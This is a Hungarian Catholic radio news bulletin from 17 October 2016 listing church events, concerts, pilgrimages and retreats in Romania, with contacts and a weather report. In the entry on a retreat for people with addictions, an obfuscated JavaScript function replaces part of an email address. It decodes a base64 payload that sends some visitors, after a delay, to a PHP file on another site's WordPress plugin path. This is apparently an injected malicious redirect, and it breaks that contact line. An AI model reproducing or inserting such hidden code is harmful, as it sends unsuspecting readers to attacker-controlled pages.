2016. október 17. – Hírek és programajánló

H Í R E K   E S T E

Egymillió csillag a szegényekért
A Gyulafehérvári Caritas szervezésében kicsik és nagyok együtt gyújtották meg október 14-én a szolidaritás lángját 16 településen.  Az idén is több mint ötezren vettek részt, és eddig összesen 40.784 lejt adományoztak. A Caritas munkatársai köszönik az adományozóknak ezt az emberséges cselekedetet. Sok rászoruló család és egyedül élő idős számára ebből az összegből a karácsony kissé megszépül – tudosított Márton Kinga Izabella a Gyulafehérvári Caritas munkatársa.

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében holnap a zalánpataki templomban tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Egymillió gyermek imája a békéért
Minden év október 18-án a világ minden táján imaórát szerveznek, hogy a gyermekek együtt imádkozzanak az egységért és a békéért. Ehhez a kezdeményezéshez csatlakozva a nagyváradi Szent László Római Katolikus Teológiai Líceum IV-XII. osztályos diákjai a nagyváradi székesegyházban imádkoznak holnap reggel kilenc órától, melyet rádiónk élő adásban  közvetít.

Koronagyűlés az irgalmasságról
2016. október 20-án, csütörtökön szervezi meg a Nagyváradi Katolikus Püspökség az Őszi Papi Koronagyűlést (Őszi Papi Találkozót). Ez alkalomból Nagyváradra érkezik az egyházmegye papsága, hogy közös továbbképzőn vegyen részt a püspöki székvárosban. A koronagyűlés előadója Kondé Lajos szeged-belvárosi plébános, püspöki helynök, aki az Irgalmasság Éve kapcsán, több évtizedes gyóntatói tapasztalatából merítve tart majd előadást. A továbbképző reggel tíz órakor kezdődik a Kanonok sor 13 szám alatt.

Hangverseny Temesváron
A Temesvári Római Katolikus Püpsökség, az Egyházmegyei Egyházzenei Hivatal, a Banatul Filharmónia és a Nyugati Egyetem Zenefakultása közös szervezésében holnap este nyolc órakor hangversenyt tartanak a székesegyházban Temesvár 1716-2016 címmel. Hívnak és várnak minden zenekedvelőt.

Véget érnek az önkéntes-találkozók
Az októberi találkozók utolsó helyszíne Kolozsvár lesz, ahová október 19-én, szerdán várjuk az önkénteseket, délután három órára a Szent Mihály Nőszövetség dísztermébe.

Párkapcsolati műhely Nagyváradon
A Nagyváradi Római Katolikus Püspökség második alkalommal szervezi meg a Párkapcsolati műhely néven ismert jegyesoktatói kurzust október 21.- 23. között az Egyházmegyei Pasztorális Központban (Nagyvárad Kanonok sor 13) A képzésre olyan nagyváradi és vidéki párok is meghívást kaptak, akik a családpasztoráció terén aktív szerepet vállaltak vagy a jövőben vállalni szeretnének. A programra jelentkezett tíz házaspárnak és nyolc egyházmegyés papnak a Kecskemétről érkező Parázs Pasztorális Központ munkatársai tartanak majd továbbképzőt.

Felvonulás a család védelmében
A Nagyváradi Katolikus Egyházmegye is csatlakozott a Koalíció a családért kezdeményezéséhez, és a család védelmében a tavasszal aláírásgyűjtést szervezett azzal a céllal, hogy az alkotmány ne két fél, hanem egy férfi és egy nő szövetségét minősítse házasságnak. A folyamat következő lépéseként az alkotmánymódosítás kezdeményezői, támogatói és az egyházak képviselői október 22-én délelőtt tizenegy órakor felvonulást szerveznek a nagyváradi Szent László téren (Piața Unirii), melyre várják mindazokat, akik nyilvánosan ki szeretnének állni keresztény értékeink védelmében.

Hivatástisztázó hétvége fiataloknak
Az esztelneki (Kovászna megye) ferences kolostorban, november 13-16. között kerül sor a Keresem az utam elnevezésű hivatástisztázó hétvégére. „Mindenkinek van egy ajándékba kapott hivatása, amelyet ha felismer, és válaszol rá, kiteljesedik az élete, megtalálja az igazi öröm forrását” – vallják a szervezők, akik hivatásukat kereső, tisztázni vágyó fiatalok számára kínálják ezt a programot. További részletekről érdeklődni és jelentkezni Pantea Tibor ferences szerzetesnél lehet a 0746-774701-es telefonszámon vagy az frtibi@gmail.com e-mail c ímen.

Időjárás:Holnap is sok felhő lesz felettünk, helyenként még alakulhat ki kisebb eső, egy-egy zápor. Élénk lesz a délkeleti szél. A reggeli órákban párás, ködös lehet a levegő. Hajnalban -4 és +6, délután 9-13 fokot mérhetünk.

MRE – Hírszolgálat, 2016. október 17.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében a mai napon Marosvásárhelyen, a kövesdombi Szent Miklós templomban tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki íly módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Őszi családpasztorációs papi találkozó
Őszi családpasztorációs papi találkozó lesz Amoris Laetitia: A családpasztoráció megújítása címmel a Csíksomlyói Jakab Antal Tanulmányi Házban. A program ma reggel kilenc órakor kezdődik és délután fél öt órától szentmisével zárul, melyet Bíró László, a Magyar Katolikus Püspöki Kar családpasztorációért felelős püspöke mutat be a csíksomlyói kegytemplomban.

Esti tagozat indul a marosvásárhelyi Római Katolikus Teológiai Líceumban
Mától lehet beiratkozni a marosvásárhelyi Római Katolikus Teológiai Líceum esti tagozatú XI. osztályába, közigazgatási technikus szakra. Az oktatás magyar nyelven zajlik, a líceum alsó tagozatát elvégzett, illetve 3 éves szakiskolát végzett diákok jelentkezhetnek. A tanítás a II. félévtől kezdődik. Beiratkozni az iskola titkárságán lehet naponta 12–14 óra között. Bővebb tájékoztatás a 0365-431.231-es telefonszámon kapható.

Hangverseny Temesváron
A Temesvári Római Katolikus Püpsökség, az Egyházmegyei Egyházzenei Hivatal, a Banatul Filharmónia és a Nyugati Egyetem Zenefakultása közös szervezésében holnap este nyolc órakor hangversenyt tartanak a székesegyházban Temesvár 1716-2016 címmel. Hívnak és várnak minden zenekedvelőt.

Véget érnek az önkéntes-találkozók
Az októberi találkozók utolsó helyszíne Kolozsvár lesz, ahová október 19-én, szerdán várjuk az önkénteseket, délután három órára a Szent Mihály Nőszövetség dísztermébe.

Nemzetközi Tudományos Teológiai Konferencia Gyulafehérváron
A Római Katolikus Teológia Kar fennállásának 20. évében nemzetközi tudományos teológiai konferenciát szervez Catholice reformare. A katolikus egyház a fejedelemség korában címmel. Az esemény október 20-21. között Gyulafehérváron kerül megrendezésre, a Pasztorálteológiai Intézet Bethlen Gábor utcai 3. szám alatti székhelyén. A konferencia részletes programja a gyulafehérvári szeminárium, pasztorálteológiai intézetének honlapján, a seminarium.ro oldalon található. Az esemény élőben is követhető lesz a szeminárium facebook oldalán.

IX. kórustalálkozó Székelyudvarhelyen
Október 22-én, szombaton, kilencedik alkalommal szerveznek kórustalálkozót a székelyudvarhelyi Szent Miklós-plébániatemplomban. Az esemény szombaton délelőtt tíz órakor szentmisével kezdődik, amelyet a kórusok bemutatkozása követ. Meghívott kórusok: a Gagliarda Kamarakórus Szekszárdról, a kézdivásárhelyi Kantai Szentháromság templom kórusa, a csíksomlyói kegytemplom kórusa és a székelyudvarhelyi Psallite Vegyeskar, valamint fellép a szervező Musica Sacra Kamarakórus.  

Zarándoklat Olaszországba
Róma, Assisi és Pádua útvonalon szerveznek zarándoklatot Székelyudvarhelyről október 24-30 között, Kopácsi Ferenc plébános kíséretével. A még néhány fennmaradt helyre jelentkezhetnek a következő telefonszámok egyikén: 0754-910105 (Hadnagy Katalinnál) vagy 0740-617687 (Máyai Erzsébetnél).

A józanság ideje
A Gyulafehérvári Caritas Ki-Út konzultációs programja és a magyarországi Katolikus Alkoholistamentő Szolgálat négy napos lelkigyakorlatos programot szervez szenvedélybetegeknek és hozzátartozóiknak a Józanság ideje címmel. A programnak a csíksomlyói Szent István Gyermekvédelmi Központ ad otthont (Szék útja 152. szám) október 27-30. között. Érdeklődni és jelentkezni október 26 déli 12 óráig lehet Lázár Andreánál, a 0732-830156-os telefonszámon, vagy az function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andrea.lazar@caritas-ab.ro e-mail címen.

Hivatástisztázó hétvége fiataloknak
Az esztelneki ferences kolostorban, november 13-16. között kerül sor a Keresem az utam elnevezésű hivatástisztázó hétvégére. „Mindenkinek van egy ajándékba kapott hivatása, amelyet ha felismer, és válaszol rá, kiteljesedik az élete, megtalálja az igazi öröm forrását” – vallják a szervezők, akik hivatásukat kereső, tisztázni vágyó fiatalok számára kínálják ezt a programot. További részletekről érdeklődni és jelentkezni Pantea Tibor ferences szerzetesnél lehet a 0746-774701-es telefonszámon vagy az frtibi@gmail.com e-mail c ímen.

Időjárás: Ma is sok lesz fölöttünk a felhő, keleten, északkeleten még előfordulhat kisebb eső. Inkább csak nyugaton, délnyugaton szakadozhat fel kissé a felhőzet. Eleinte többfelé párás, helyenként ködössé válhat a levegő. Napközben 7-13 fokot mérhetünk.

MRE - Hírszolgálat, 2016. október 17.

About the author

maradmin

Leave a Comment